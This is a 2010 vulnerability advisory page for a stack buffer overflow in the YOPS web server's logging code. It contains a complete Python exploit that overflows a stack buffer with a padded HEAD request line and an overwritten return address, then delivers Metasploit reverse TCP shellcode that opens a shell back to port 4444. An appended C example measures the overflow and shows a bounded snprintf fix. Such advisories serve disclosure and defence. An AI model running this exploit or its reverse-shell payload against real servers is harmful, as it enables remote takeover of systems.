YOPS Remote Command Execution

🗓️ 11 Sep 2010 00:00:00 · Reported by ipax · Type: packetstorm · 🔗 packetstormsecurity.com

YOPS Remote Command Execution vulnerability in YOPS 2009-11-30. An over-long HTTP request line (HEAD/GET/POST) is accepted without a length check and later formatted with sprintf() into a fixed-size stack buffer in the logging stage, allowing remote code execution.

Code
`[DCA-00015]  
  
[Software]  
  
- YOPS (Your Own Personal [WEB] Server)
  
[Vendor Product Description]  
  
- YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP  
server for Linux OS written in C. There are 7 stages (accept, parse,  
launch, fetch, error, send and log), and pipes are used as interstage  
channels.  
  
[Bug Description]  
  
- In function http_parse_request_header the application does not bound the
length of the request line it receives as an HTTP command (HEAD/GET/POST).
The unchecked line is stored in job->hdr.request_line and later formatted
with sprintf() into the fixed-size stack buffer logrec[MAX_REQUEST_LINE_LEN + 1]
in swebs_record_log, so an over-long request line overflows the stack.
  
--- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
    int r;
    int ver, rev;
    char *s, *tok, *l, *prm;
    [...]
    r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
    if (r != 2)
        return -400;
    [...]
}
--- END snippet ---
  
--- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
    int err;
    time_t now;
    char timestr[32];
    char logrec[MAX_REQUEST_LINE_LEN + 1];
    [...]
    sprintf (
        logrec,
        "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
        job->client,
        timestr,
        job->hdr.request_line,
        job->response_hlen,
        job->response_blen_sent,
        job->response_blen,
        job->status
    );
    [...]
}
--- END snippet ---
  
[History]  
  
- Advisory sent to vendor on 08/26/2010  
  
[Impact]  
  
- High (Remote Command Execution)  
  
[Affected Version]  
  
- YOPS 2009-11-30  
  
- Prior versions may also be vulnerable  
  
[Code]  
  
#!/usr/bin/env python3
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
# server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

import socket
import sys
import time

HOST = "localhost"
PORT = 8888

# Length of the 'A' padding before the return address; optional first argument.
try:
    BUFF_LEN = int(sys.argv[1])
except (IndexError, ValueError):
    BUFF_LEN = 802

# Address the overwritten return address is pointed at (0x0804ce47, little-endian).
FIXUP_ADDR = b"\x47\xce\x04\x08"

shellcode = (
    # MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
    b"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
    b"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
    b"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
    b"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
    b"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
    b"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
    b"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)

# Request line: method, padding up to the saved return address, the return
# address repeated four times, then the " HTTP/1.1" token that
# http_parse_request_header() requires before the request reaches the logger.
buffer = b"HEAD "
buffer += b"A" * BUFF_LEN
buffer += FIXUP_ADDR * 4
buffer += b" HTTP/1.1"

stackadjust = (
    b"\xcb"                   # instruction alignment
    b"\xbc\x69\x69\x96\xb0"   # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + b"\r\n\r\n"

print("""
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
""")

print(" [+] Using BUFF_LEN ->", BUFF_LEN)

# First request: a harmless HEAD so the server initialises its per-job state.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(" [+] Trying to establish connection...")
s.connect((HOST, PORT))
print(" [+] Sending a dummy request to initialize data...")
s.send(b"HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except socket.error:
    pass
s.close()

time.sleep(3)

# Second request: the over-long request line that overflows logrec in
# swebs_record_log() and hands control to the shellcode.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print(" [+] Sending our malicious payload...")
s.send(payload)
print(" [+] Payload sent, good luck!")
s.close()
  
  
--   
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`
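The log-formatting pattern quoted in the advisory's swebs.c snippet, reproduced and measured as an added example (this is not YOPS' code): log_record_needed() computes how many bytes the original sprintf() would write for a given request line, log_record_overflows() compares that against a logrec[MAX_REQUEST_LINE_LEN + 1] buffer, and record_log_bounded() plus request_line_acceptable() show the bounded write and the parse-time length check the advisory says are missing. struct job, its field sizes, the value 512 for MAX_REQUEST_LINE_LEN, the client string and the timestamp are all constructed here; the advisory does not give YOPS' real values. The "exploit-shaped" request line uses sixteen 'B' bytes where the published exploit places FIXUP_ADDR*4, not a real address.

```c
/* Added example, not YOPS code. Reproduces the swebs_record_log() pattern
 * from the advisory, measures when it overflows, and shows a bounded
 * replacement. All sizes and sample values below are assumptions. */
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE_LEN 512   /* assumed; the advisory does not give the real value */

/* Format string copied from the advisory's swebs_record_log() snippet. */
#define LOG_FMT "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d"

/* Stand-in for the JOB fields the logger prints (field sizes assumed). */
struct job {
    char client[64];
    char request_line[4096];   /* attacker-controlled request line */
    int response_hlen;
    int response_blen_sent;
    int response_blen;
    int status;
};

/* Build a request line shaped like the advisory's payload: "HEAD ", pad
 * bytes of 'A', 16 filler bytes ('B', not an address) where the exploit puts
 * FIXUP_ADDR*4, then " HTTP/1.1". Returns bytes written, 0 if it won't fit. */
size_t build_exploit_shaped_request(char *dst, size_t dstlen, size_t pad)
{
    const char *head = "HEAD ", *tail = " HTTP/1.1";
    size_t need = strlen(head) + pad + 16 + strlen(tail);
    if (need + 1 > dstlen)
        return 0;
    char *p = dst;
    memcpy(p, head, strlen(head)); p += strlen(head);
    memset(p, 'A', pad);           p += pad;
    memset(p, 'B', 16);            p += 16;
    memcpy(p, tail, strlen(tail)); p += strlen(tail);
    *p = '\0';
    return need;
}

/* Bytes the original unbounded sprintf() would write, NUL excluded. */
size_t log_record_needed(const struct job *job, const char *timestr)
{
    int n = snprintf(NULL, 0, LOG_FMT, job->client, timestr, job->request_line,
                     job->response_hlen, job->response_blen_sent,
                     job->response_blen, job->status);
    return n < 0 ? 0 : (size_t)n;
}

/* 1 if the original logrec[MAX_REQUEST_LINE_LEN + 1] would overflow. */
int log_record_overflows(const struct job *job, const char *timestr)
{
    return log_record_needed(job, timestr) > MAX_REQUEST_LINE_LEN;
}

/* Hardened replacement: bounded write; an over-long record is refused
 * (returns -1, empty string) instead of being silently truncated. */
int record_log_bounded(char *logrec, size_t logrec_size,
                       const struct job *job, const char *timestr)
{
    int n = snprintf(logrec, logrec_size, LOG_FMT, job->client, timestr,
                     job->request_line, job->response_hlen,
                     job->response_blen_sent, job->response_blen, job->status);
    if (n < 0 || (size_t)n >= logrec_size) {
        if (logrec_size)
            logrec[0] = '\0';
        return -1;
    }
    return n;
}

/* Parse-time bound the advisory says is missing: 1 if the line is at most
 * MAX_REQUEST_LINE_LEN bytes. The caller's buffer must be NUL-terminated or
 * at least MAX_REQUEST_LINE_LEN + 1 bytes long. */
int request_line_acceptable(const char *line)
{
    return memchr(line, '\0', MAX_REQUEST_LINE_LEN + 1) != NULL;
}

int main(void)
{
    struct job j;
    char logrec[MAX_REQUEST_LINE_LEN + 1];
    const char *ts = "11/Sep/2010:00:00:00 +0000";   /* constructed timestamp */

    memset(&j, 0, sizeof j);
    strcpy(j.client, "127.0.0.1");                    /* constructed client */
    build_exploit_shaped_request(j.request_line, sizeof j.request_line, 802);
    printf("exploit-shaped line: sprintf would write %zu bytes, overflows=%d, bounded=%d\n",
           log_record_needed(&j, ts), log_record_overflows(&j, ts),
           record_log_bounded(logrec, sizeof logrec, &j, ts));

    strcpy(j.request_line, "HEAD / HTTP/1.1");
    printf("normal line: overflows=%d, bounded=%d, record=\"%s\"\n",
           log_record_overflows(&j, ts),
           record_log_bounded(logrec, sizeof logrec, &j, ts), logrec);
    return 0;
}
```

One point the snippet makes clearer than the bug description: logrec is sized for the request line alone, but the record also carries the client address, the bracketed timestamp and four counters, so a request line that is exactly MAX_REQUEST_LINE_LEN bytes long still overflows. A parse-time limit therefore has to leave headroom for those fields, or the write has to be bounded where it happens, as record_log_bounded() does.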
